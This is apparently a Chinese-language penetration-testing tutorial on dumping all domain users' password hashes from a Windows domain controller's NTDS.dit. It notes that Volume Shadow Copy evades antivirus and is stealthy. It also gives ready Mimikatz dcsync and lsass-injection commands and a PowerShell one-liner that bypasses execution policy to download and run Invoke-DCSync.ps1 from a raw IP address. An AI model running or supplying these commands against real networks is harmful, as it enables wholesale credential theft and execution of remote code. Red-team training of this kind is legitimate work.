内网中提取域控的密码的哈希值

在渗透测试中非常常见，其中已实现域管理员访问以提取所有域用户的密码哈希以进行脱机破解和分析。这些哈希值存储在域控制器（NTDS.DIT​​）中的数据库文件(并且受保护 无法进行直接复制等操作)中，并带有一些其他信息，如组成员身份和用户。

NTDS.DIT文件位于：C:\Windows\NTDS\NTDS.dit

可以使用各种技术来提取此文件或存储在其中的信息，但是大多数技术都使用以下方法之一：

• 域控制器复制服务
• 原生Windows二进制文件
• WMI

---

Volume Shadow Copy

• Volume Shadow Copy Service 是微软从 Windows XP 开始提供的用于创建一致性的时间点副本（也就是快照）的服务框架。

• 用于数据备份

• 支持Windows Server 2003 及以上操作系统

• 系统默认在特定条件下自动创建数据备份，如补丁安装后。在Win7系统大概每隔一周自动创建备份，该时间无法确定

• 禁用VSS会影响系统正常使用，如 System Restore和 Windows Server Backup

优点：
1.导出所有的域用户的HASH
2.免杀
3.隐蔽性高

---

Mimikatz

Mimikatz有一个功能（dcsync），它利用目录复制服务（DRS）从NTDS.DIT​​文件中检索密码哈希值。此技术消除了直接使用域控制器进行身份验证的需要，因为它可以从域管理员的上下文中从域的任何系统执行。因此它是红队的标准技术，因为它不那么嘈杂。

lsadump::dcsync /domain:top.pentest.top /all /csv

一句话用法：

mimikatz.exe log "privilege::debug" "lsadump::dcsync /domain:top.pentest.top /all /csv"

结果：

或者直接在域控中直接通过lsass.exe进程dump哈希

mimikatz.exe log "privilege::debug" "lsadump::lsa /inject"

Invoke-DCSync

Invoke–DCSync 是Nick Landers利用PowerView开发的powershell脚本。

Invoke-ReflectivePEInjection和PowerKatz的DLL wrapper 调用Mimikatz的DCSync方法检索哈希值。
直接执行该函数将生成以下输出：

powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://120.79.66.58/Invoke-DCSync.ps1');Invoke-DCSync -PWDumpFormat"